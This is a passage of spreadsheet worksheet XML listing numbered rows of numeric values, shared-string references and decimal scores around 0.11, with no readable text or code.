    <row r="28820" ht="15.75" customHeight="1">
      <c r="A28820" s="1">
        <v>11143.0</v>
      </c>
      <c r="B28820" s="2">
        <v>1.9332619E7</v>
      </c>
      <c r="C28820" s="2" t="s">
        <v>27703</v>
      </c>
      <c r="D28820" s="2">
        <v>1.0</v>
      </c>
      <c r="E28820" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28820" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="28821" ht="15.75" customHeight="1">
      <c r="A28821" s="1">
        <v>11540.0</v>
      </c>
      <c r="B28821" s="2">
        <v>2.2601142E7</v>
      </c>
      <c r="C28821" s="2" t="s">
        <v>27704</v>
      </c>
      <c r="D28821" s="2">
        <v>1.0</v>
      </c>
      <c r="E28821" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28821" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="28822" ht="15.75" customHeight="1">
      <c r="A28822" s="1">
        <v>27370.0</v>
      </c>
      <c r="B28822" s="2">
        <v>2.1682419E7</v>
      </c>
      <c r="C28822" s="2" t="s">
        <v>27705</v>
      </c>
      <c r="D28822" s="2">
        <v>1.0</v>
      </c>
      <c r="E28822" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28822" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="28823" ht="15.75" customHeight="1">
      <c r="A28823" s="1">
        <v>33644.0</v>
      </c>
      <c r="B28823" s="2">
        <v>8394459.0</v>
      </c>
      <c r="C28823" s="2" t="s">
        <v>27706</v>
      </c>
      <c r="D28823" s="2">
        <v>1.0</v>
      </c>
      <c r="E28823" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28823" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="28824" ht="15.75" customHeight="1">
      <c r="A28824" s="1">
        <v>1761.0</v>
      </c>
      <c r="B28824" s="2">
        <v>2.8930135E7</v>
      </c>
      <c r="C28824" s="2" t="s">
        <v>27707</v>
      </c>
      <c r="D28824" s="2">
        <v>1.0</v>
      </c>
      <c r="E28824" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28824" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="28825" ht="15.75" customHeight="1">
      <c r="A28825" s="1">
        <v>13268.0</v>
      </c>
      <c r="B28825" s="2">
        <v>3.4363085E7</v>
      </c>
      <c r="C28825" s="2" t="s">
        <v>27708</v>
      </c>
      <c r="D28825" s="2">
        <v>1.0</v>
      </c>
      <c r="E28825" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28825" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="28826" ht="15.75" customHeight="1">
      <c r="A28826" s="1">
        <v>14859.0</v>
      </c>
      <c r="B28826" s="2">
        <v>4.1067553E7</v>
      </c>
      <c r="C28826" s="2" t="s">
        <v>27709</v>
      </c>
      <c r="D28826" s="2">
        <v>1.0</v>
      </c>
      <c r="E28826" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28826" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="28827" ht="15.75" customHeight="1">
      <c r="A28827" s="1">
        <v>19500.0</v>
      </c>
      <c r="B28827" s="2">
        <v>5.5906694E7</v>
      </c>
      <c r="C28827" s="2" t="s">
        <v>27710</v>
      </c>
      <c r="D28827" s="2">
        <v>1.0</v>
      </c>
      <c r="E28827" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28827" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="28828" ht="15.75" customHeight="1">
      <c r="A28828" s="1">
        <v>5681.0</v>
      </c>
      <c r="B28828" s="2">
        <v>4.6395192E7</v>
      </c>
      <c r="C28828" s="2" t="s">
        <v>27711</v>
      </c>
      <c r="D28828" s="2">
        <v>1.0</v>
      </c>
      <c r="E28828" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28828" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="28829" ht="15.75" customHeight="1">
      <c r="A28829" s="1">
        <v>12709.0</v>
      </c>
      <c r="B28829" s="2">
        <v>3.0831773E7</v>
      </c>
      <c r="C28829" s="2" t="s">
        <v>27712</v>
      </c>
      <c r="D28829" s="2">
        <v>1.0</v>
      </c>
      <c r="E28829" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28829" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="28830" ht="15.75" customHeight="1">
      <c r="A28830" s="1">
        <v>30782.0</v>
      </c>
      <c r="B28830" s="2">
        <v>4.4768575E7</v>
      </c>
      <c r="C28830" s="2" t="s">
        <v>27713</v>
      </c>
      <c r="D28830" s="2">
        <v>1.0</v>
      </c>
      <c r="E28830" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28830" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="28831" ht="15.75" customHeight="1">
      <c r="A28831" s="1">
        <v>32768.0</v>
      </c>
      <c r="B28831" s="2">
        <v>6075795.0</v>
      </c>
      <c r="C28831" s="2" t="s">
        <v>27714</v>
      </c>
      <c r="D28831" s="2">
        <v>1.0</v>
      </c>
      <c r="E28831" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28831" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="28832" ht="15.75" customHeight="1">
      <c r="A28832" s="1">
        <v>3659.0</v>
      </c>
      <c r="B28832" s="2">
        <v>3.9331434E7</v>
      </c>
      <c r="C28832" s="2" t="s">
        <v>27715</v>
      </c>
      <c r="D28832" s="2">
        <v>1.0</v>
      </c>
      <c r="E28832" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28832" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="28833" ht="15.75" customHeight="1">
      <c r="A28833" s="1">
        <v>14166.0</v>
      </c>
      <c r="B28833" s="2">
        <v>3.8029084E7</v>
      </c>
      <c r="C28833" s="2" t="s">
        <v>27716</v>
      </c>
      <c r="D28833" s="2">
        <v>1.0</v>
      </c>
      <c r="E28833" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28833" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="28834" ht="15.75" customHeight="1">
      <c r="A28834" s="1">
        <v>13076.0</v>
      </c>
      <c r="B28834" s="2">
        <v>3.3340182E7</v>
      </c>
      <c r="C28834" s="2" t="s">
        <v>27717</v>
      </c>
      <c r="D28834" s="2">
        <v>1.0</v>
      </c>
      <c r="E28834" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28834" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="28835" ht="15.75" customHeight="1">
      <c r="A28835" s="1">
        <v>3825.0</v>
      </c>
      <c r="B28835" s="2">
        <v>4.0140574E7</v>
      </c>
      <c r="C28835" s="2" t="s">
        <v>27718</v>
      </c>
      <c r="D28835" s="2">
        <v>1.0</v>
      </c>
      <c r="E28835" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28835" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="28836" ht="15.75" customHeight="1">
      <c r="A28836" s="1">
        <v>12579.0</v>
      </c>
      <c r="B28836" s="2">
        <v>3.0012469E7</v>
      </c>
      <c r="C28836" s="2" t="s">
        <v>27719</v>
      </c>
      <c r="D28836" s="2">
        <v>1.0</v>
      </c>
      <c r="E28836" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28836" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="28837" ht="15.75" customHeight="1">
      <c r="A28837" s="1">
        <v>25306.0</v>
      </c>
      <c r="B28837" s="2">
        <v>1.3419234E7</v>
      </c>
      <c r="C28837" s="2" t="s">
        <v>27720</v>
      </c>
      <c r="D28837" s="2">
        <v>1.0</v>
      </c>
      <c r="E28837" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28837" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="28838" ht="15.75" customHeight="1">
      <c r="A28838" s="1">
        <v>31464.0</v>
      </c>
      <c r="B28838" s="2">
        <v>5.0434816E7</v>
      </c>
      <c r="C28838" s="2" t="s">
        <v>27721</v>
      </c>
      <c r="D28838" s="2">
        <v>1.0</v>
      </c>
      <c r="E28838" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28838" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="28839" ht="15.75" customHeight="1">
      <c r="A28839" s="1">
        <v>4707.0</v>
      </c>
      <c r="B28839" s="2">
        <v>4.3256365E7</v>
      </c>
      <c r="C28839" s="2" t="s">
        <v>27722</v>
      </c>
      <c r="D28839" s="2">
        <v>1.0</v>
      </c>
      <c r="E28839" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28839" s="2">
        <v>0.1119162640901772</v>
      </c>
    </row>
    <row r="28840" ht="15.75" customHeight="1">
      <c r="A28840" s="1">
        <v>14879.0</v>
      </c>
      <c r="B28840" s="2">
        <v>4.1085695E7</v>
      </c>
      <c r="C28840" s="2" t="s">
        <v>27723</v>
      </c>
      <c r="D28840" s="2">
        <v>1.0</v>
      </c>
      <c r="E28840" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28840" s="2">
        <v>0.1118935837245697</v>
      </c>
    </row>
    <row r="28841" ht="15.75" customHeight="1">
      <c r="A28841" s="1">
        <v>25652.0</v>
      </c>
      <c r="B28841" s="2">
        <v>1.452297E7</v>
      </c>
      <c r="C28841" s="2" t="s">
        <v>27724</v>
      </c>
      <c r="D28841" s="2">
        <v>1.0</v>
      </c>
      <c r="E28841" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28841" s="2">
        <v>0.1102941176470588</v>
      </c>
    </row>
    <row r="28842" ht="15.75" customHeight="1">
      <c r="A28842" s="1">
        <v>6133.0</v>
      </c>
      <c r="B28842" s="2">
        <v>4.7804033E7</v>
      </c>
      <c r="C28842" s="2" t="s">
        <v>27725</v>
      </c>
      <c r="D28842" s="2">
        <v>1.0</v>
      </c>
      <c r="E28842" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28842" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="28843" ht="15.75" customHeight="1">
      <c r="A28843" s="1">
        <v>2384.0</v>
      </c>
      <c r="B28843" s="2">
        <v>3.3327767E7</v>
      </c>
      <c r="C28843" s="2" t="s">
        <v>27726</v>
      </c>
      <c r="D28843" s="2">
        <v>1.0</v>
      </c>
      <c r="E28843" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28843" s="2">
        <v>0.1102292768959436</v>
      </c>
    </row>
    <row r="28844" ht="15.75" customHeight="1">
      <c r="A28844" s="1">
        <v>26500.0</v>
      </c>
      <c r="B28844" s="2">
        <v>1.7540851E7</v>
      </c>
      <c r="C28844" s="2" t="s">
        <v>27727</v>
      </c>
      <c r="D28844" s="2">
        <v>1.0</v>
      </c>
      <c r="E28844" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28844" s="2">
        <v>0.1102150537634408</v>
      </c>
    </row>
    <row r="28845" ht="15.75" customHeight="1">
      <c r="A28845" s="1">
        <v>11455.0</v>
      </c>
      <c r="B28845" s="2">
        <v>2.1833251E7</v>
      </c>
      <c r="C28845" s="2" t="s">
        <v>27728</v>
      </c>
      <c r="D28845" s="2">
        <v>1.0</v>
      </c>
      <c r="E28845" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28845" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="28846" ht="15.75" customHeight="1">
      <c r="A28846" s="1">
        <v>12940.0</v>
      </c>
      <c r="B28846" s="2">
        <v>3.237281E7</v>
      </c>
      <c r="C28846" s="2" t="s">
        <v>27729</v>
      </c>
      <c r="D28846" s="2">
        <v>1.0</v>
      </c>
      <c r="E28846" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28846" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="28847" ht="15.75" customHeight="1">
      <c r="A28847" s="1">
        <v>30551.0</v>
      </c>
      <c r="B28847" s="2">
        <v>4.0646435E7</v>
      </c>
      <c r="C28847" s="2" t="s">
        <v>27730</v>
      </c>
      <c r="D28847" s="2">
        <v>1.0</v>
      </c>
      <c r="E28847" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28847" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="28848" ht="15.75" customHeight="1">
      <c r="A28848" s="1">
        <v>11145.0</v>
      </c>
      <c r="B28848" s="2">
        <v>1.9332619E7</v>
      </c>
      <c r="C28848" s="2" t="s">
        <v>27731</v>
      </c>
      <c r="D28848" s="2">
        <v>1.0</v>
      </c>
      <c r="E28848" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28848" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="28849" ht="15.75" customHeight="1">
      <c r="A28849" s="1">
        <v>29902.0</v>
      </c>
      <c r="B28849" s="2">
        <v>3607044.0</v>
      </c>
      <c r="C28849" s="2" t="s">
        <v>27732</v>
      </c>
      <c r="D28849" s="2">
        <v>1.0</v>
      </c>
      <c r="E28849" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28849" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="28850" ht="15.75" customHeight="1">
      <c r="A28850" s="1">
        <v>7043.0</v>
      </c>
      <c r="B28850" s="2">
        <v>5.0144401E7</v>
      </c>
      <c r="C28850" s="2" t="s">
        <v>27733</v>
      </c>
      <c r="D28850" s="2">
        <v>1.0</v>
      </c>
      <c r="E28850" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28850" s="2">
        <v>0.1101851851851851</v>
      </c>
    </row>
    <row r="28851" ht="15.75" customHeight="1">
      <c r="A28851" s="1">
        <v>26073.0</v>
      </c>
      <c r="B28851" s="2">
        <v>1.561117E7</v>
      </c>
      <c r="C28851" s="2" t="s">
        <v>27734</v>
      </c>
      <c r="D28851" s="2">
        <v>1.0</v>
      </c>
      <c r="E28851" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28851" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="28852" ht="15.75" customHeight="1">
      <c r="A28852" s="1">
        <v>26116.0</v>
      </c>
      <c r="B28852" s="2">
        <v>1.5866499E7</v>
      </c>
      <c r="C28852" s="2" t="s">
        <v>27735</v>
      </c>
      <c r="D28852" s="2">
        <v>1.0</v>
      </c>
      <c r="E28852" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28852" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="28853" ht="15.75" customHeight="1">
      <c r="A28853" s="1">
        <v>33764.0</v>
      </c>
      <c r="B28853" s="2">
        <v>8631858.0</v>
      </c>
      <c r="C28853" s="2" t="s">
        <v>27736</v>
      </c>
      <c r="D28853" s="2">
        <v>1.0</v>
      </c>
      <c r="E28853" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28853" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="28854" ht="15.75" customHeight="1">
      <c r="A28854" s="1">
        <v>4486.0</v>
      </c>
      <c r="B28854" s="2">
        <v>4.2513396E7</v>
      </c>
      <c r="C28854" s="2" t="s">
        <v>27737</v>
      </c>
      <c r="D28854" s="2">
        <v>1.0</v>
      </c>
      <c r="E28854" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28854" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="28855" ht="15.75" customHeight="1">
      <c r="A28855" s="1">
        <v>13926.0</v>
      </c>
      <c r="B28855" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C28855" s="2" t="s">
        <v>27738</v>
      </c>
      <c r="D28855" s="2">
        <v>1.0</v>
      </c>
      <c r="E28855" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28855" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="28856" ht="15.75" customHeight="1">
      <c r="A28856" s="1">
        <v>16598.0</v>
      </c>
      <c r="B28856" s="2">
        <v>4.7016912E7</v>
      </c>
      <c r="C28856" s="2" t="s">
        <v>27739</v>
      </c>
      <c r="D28856" s="2">
        <v>1.0</v>
      </c>
      <c r="E28856" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28856" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="28857" ht="15.75" customHeight="1">
      <c r="A28857" s="1">
        <v>25450.0</v>
      </c>
      <c r="B28857" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C28857" s="2" t="s">
        <v>27740</v>
      </c>
      <c r="D28857" s="2">
        <v>1.0</v>
      </c>
      <c r="E28857" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28857" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="28858" ht="15.75" customHeight="1">
      <c r="A28858" s="1">
        <v>652.0</v>
      </c>
      <c r="B28858" s="2">
        <v>1.9935457E7</v>
      </c>
      <c r="C28858" s="2" t="s">
        <v>27741</v>
      </c>
      <c r="D28858" s="2">
        <v>1.0</v>
      </c>
      <c r="E28858" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28858" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28859" ht="15.75" customHeight="1">
      <c r="A28859" s="1">
        <v>3004.0</v>
      </c>
      <c r="B28859" s="2">
        <v>3.6334582E7</v>
      </c>
      <c r="C28859" s="2" t="s">
        <v>27742</v>
      </c>
      <c r="D28859" s="2">
        <v>1.0</v>
      </c>
      <c r="E28859" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28859" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28860" ht="15.75" customHeight="1">
      <c r="A28860" s="1">
        <v>12128.0</v>
      </c>
      <c r="B28860" s="2">
        <v>2.6938194E7</v>
      </c>
      <c r="C28860" s="2" t="s">
        <v>27743</v>
      </c>
      <c r="D28860" s="2">
        <v>1.0</v>
      </c>
      <c r="E28860" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28860" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28861" ht="15.75" customHeight="1">
      <c r="A28861" s="1">
        <v>22074.0</v>
      </c>
      <c r="B28861" s="2">
        <v>3.0607665E7</v>
      </c>
      <c r="C28861" s="2" t="s">
        <v>27744</v>
      </c>
      <c r="D28861" s="2">
        <v>1.0</v>
      </c>
      <c r="E28861" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28861" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28862" ht="15.75" customHeight="1">
      <c r="A28862" s="1">
        <v>22109.0</v>
      </c>
      <c r="B28862" s="2">
        <v>3.0950935E7</v>
      </c>
      <c r="C28862" s="2" t="s">
        <v>27745</v>
      </c>
      <c r="D28862" s="2">
        <v>1.0</v>
      </c>
      <c r="E28862" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28862" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28863" ht="15.75" customHeight="1">
      <c r="A28863" s="1">
        <v>24198.0</v>
      </c>
      <c r="B28863" s="2">
        <v>1.0300773E7</v>
      </c>
      <c r="C28863" s="2" t="s">
        <v>27746</v>
      </c>
      <c r="D28863" s="2">
        <v>1.0</v>
      </c>
      <c r="E28863" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28863" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28864" ht="15.75" customHeight="1">
      <c r="A28864" s="1">
        <v>26055.0</v>
      </c>
      <c r="B28864" s="2">
        <v>1.5524904E7</v>
      </c>
      <c r="C28864" s="2" t="s">
        <v>27747</v>
      </c>
      <c r="D28864" s="2">
        <v>1.0</v>
      </c>
      <c r="E28864" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28864" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28865" ht="15.75" customHeight="1">
      <c r="A28865" s="1">
        <v>28751.0</v>
      </c>
      <c r="B28865" s="2">
        <v>2.8122951E7</v>
      </c>
      <c r="C28865" s="2" t="s">
        <v>27748</v>
      </c>
      <c r="D28865" s="2">
        <v>1.0</v>
      </c>
      <c r="E28865" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28865" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="28866" ht="15.75" customHeight="1">
      <c r="A28866" s="1">
        <v>564.0</v>
      </c>
      <c r="B28866" s="2">
        <v>1.8970748E7</v>
      </c>
      <c r="C28866" s="2" t="s">
        <v>27749</v>
      </c>
      <c r="D28866" s="2">
        <v>1.0</v>
      </c>
      <c r="E28866" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28866" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28867" ht="15.75" customHeight="1">
      <c r="A28867" s="1">
        <v>1661.0</v>
      </c>
      <c r="B28867" s="2">
        <v>2.8171193E7</v>
      </c>
      <c r="C28867" s="2" t="s">
        <v>27750</v>
      </c>
      <c r="D28867" s="2">
        <v>1.0</v>
      </c>
      <c r="E28867" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28867" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28868" ht="15.75" customHeight="1">
      <c r="A28868" s="1">
        <v>1796.0</v>
      </c>
      <c r="B28868" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C28868" s="2" t="s">
        <v>27751</v>
      </c>
      <c r="D28868" s="2">
        <v>1.0</v>
      </c>
      <c r="E28868" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28868" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28869" ht="15.75" customHeight="1">
      <c r="A28869" s="1">
        <v>2009.0</v>
      </c>
      <c r="B28869" s="2">
        <v>3.0676188E7</v>
      </c>
      <c r="C28869" s="2" t="s">
        <v>27752</v>
      </c>
      <c r="D28869" s="2">
        <v>1.0</v>
      </c>
      <c r="E28869" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28869" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28870" ht="15.75" customHeight="1">
      <c r="A28870" s="1">
        <v>2454.0</v>
      </c>
      <c r="B28870" s="2">
        <v>3.3715641E7</v>
      </c>
      <c r="C28870" s="2" t="s">
        <v>27753</v>
      </c>
      <c r="D28870" s="2">
        <v>1.0</v>
      </c>
      <c r="E28870" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28870" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28871" ht="15.75" customHeight="1">
      <c r="A28871" s="1">
        <v>3098.0</v>
      </c>
      <c r="B28871" s="2">
        <v>3.6699831E7</v>
      </c>
      <c r="C28871" s="2" t="s">
        <v>27754</v>
      </c>
      <c r="D28871" s="2">
        <v>1.0</v>
      </c>
      <c r="E28871" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28871" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28872" ht="15.75" customHeight="1">
      <c r="A28872" s="1">
        <v>4127.0</v>
      </c>
      <c r="B28872" s="2">
        <v>4.1380849E7</v>
      </c>
      <c r="C28872" s="2" t="s">
        <v>27755</v>
      </c>
      <c r="D28872" s="2">
        <v>1.0</v>
      </c>
      <c r="E28872" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28872" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28873" ht="15.75" customHeight="1">
      <c r="A28873" s="1">
        <v>4289.0</v>
      </c>
      <c r="B28873" s="2">
        <v>4.1904546E7</v>
      </c>
      <c r="C28873" s="2" t="s">
        <v>27756</v>
      </c>
      <c r="D28873" s="2">
        <v>1.0</v>
      </c>
      <c r="E28873" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28873" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28874" ht="15.75" customHeight="1">
      <c r="A28874" s="1">
        <v>4429.0</v>
      </c>
      <c r="B28874" s="2">
        <v>4.2330098E7</v>
      </c>
      <c r="C28874" s="2" t="s">
        <v>27757</v>
      </c>
      <c r="D28874" s="2">
        <v>1.0</v>
      </c>
      <c r="E28874" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28874" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28875" ht="15.75" customHeight="1">
      <c r="A28875" s="1">
        <v>4572.0</v>
      </c>
      <c r="B28875" s="2">
        <v>4.2763923E7</v>
      </c>
      <c r="C28875" s="2" t="s">
        <v>27758</v>
      </c>
      <c r="D28875" s="2">
        <v>1.0</v>
      </c>
      <c r="E28875" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28875" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28876" ht="15.75" customHeight="1">
      <c r="A28876" s="1">
        <v>4594.0</v>
      </c>
      <c r="B28876" s="2">
        <v>4.2804462E7</v>
      </c>
      <c r="C28876" s="2" t="s">
        <v>27759</v>
      </c>
      <c r="D28876" s="2">
        <v>1.0</v>
      </c>
      <c r="E28876" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28876" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28877" ht="15.75" customHeight="1">
      <c r="A28877" s="1">
        <v>4748.0</v>
      </c>
      <c r="B28877" s="2">
        <v>4.3385448E7</v>
      </c>
      <c r="C28877" s="2" t="s">
        <v>27760</v>
      </c>
      <c r="D28877" s="2">
        <v>1.0</v>
      </c>
      <c r="E28877" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28877" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28878" ht="15.75" customHeight="1">
      <c r="A28878" s="1">
        <v>6982.0</v>
      </c>
      <c r="B28878" s="2">
        <v>5.0030611E7</v>
      </c>
      <c r="C28878" s="2" t="s">
        <v>27761</v>
      </c>
      <c r="D28878" s="2">
        <v>1.0</v>
      </c>
      <c r="E28878" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28878" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28879" ht="15.75" customHeight="1">
      <c r="A28879" s="1">
        <v>8157.0</v>
      </c>
      <c r="B28879" s="2">
        <v>5.3190455E7</v>
      </c>
      <c r="C28879" s="2" t="s">
        <v>27762</v>
      </c>
      <c r="D28879" s="2">
        <v>1.0</v>
      </c>
      <c r="E28879" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28879" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28880" ht="15.75" customHeight="1">
      <c r="A28880" s="1">
        <v>10355.0</v>
      </c>
      <c r="B28880" s="2">
        <v>7252674.0</v>
      </c>
      <c r="C28880" s="2" t="s">
        <v>27763</v>
      </c>
      <c r="D28880" s="2">
        <v>1.0</v>
      </c>
      <c r="E28880" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28880" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28881" ht="15.75" customHeight="1">
      <c r="A28881" s="1">
        <v>10505.0</v>
      </c>
      <c r="B28881" s="2">
        <v>1.1423041E7</v>
      </c>
      <c r="C28881" s="2" t="s">
        <v>27764</v>
      </c>
      <c r="D28881" s="2">
        <v>1.0</v>
      </c>
      <c r="E28881" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28881" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28882" ht="15.75" customHeight="1">
      <c r="A28882" s="1">
        <v>11186.0</v>
      </c>
      <c r="B28882" s="2">
        <v>1.9780938E7</v>
      </c>
      <c r="C28882" s="2" t="s">
        <v>27765</v>
      </c>
      <c r="D28882" s="2">
        <v>1.0</v>
      </c>
      <c r="E28882" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28882" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28883" ht="15.75" customHeight="1">
      <c r="A28883" s="1">
        <v>11323.0</v>
      </c>
      <c r="B28883" s="2">
        <v>2.1080342E7</v>
      </c>
      <c r="C28883" s="2" t="s">
        <v>27766</v>
      </c>
      <c r="D28883" s="2">
        <v>1.0</v>
      </c>
      <c r="E28883" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28883" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28884" ht="15.75" customHeight="1">
      <c r="A28884" s="1">
        <v>11360.0</v>
      </c>
      <c r="B28884" s="2">
        <v>2.1340215E7</v>
      </c>
      <c r="C28884" s="2" t="s">
        <v>27767</v>
      </c>
      <c r="D28884" s="2">
        <v>1.0</v>
      </c>
      <c r="E28884" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28884" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28885" ht="15.75" customHeight="1">
      <c r="A28885" s="1">
        <v>12033.0</v>
      </c>
      <c r="B28885" s="2">
        <v>2.6268716E7</v>
      </c>
      <c r="C28885" s="2" t="s">
        <v>27768</v>
      </c>
      <c r="D28885" s="2">
        <v>1.0</v>
      </c>
      <c r="E28885" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28885" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="28886" ht="15.75" customHeight="1">
      <c r="A28886" s="1">
        <v>12203.0</v>
      </c>
      <c r="B28886" s="2">
        <v>2.7500534E7</v>
      </c>
      <c r="C28886" s="2" t="s">
        <v>27769</v>
      </c>
      <c r="D28886" s="2">
        <v>1.0</v>
      </c>
      <c r="E28886" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28886" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
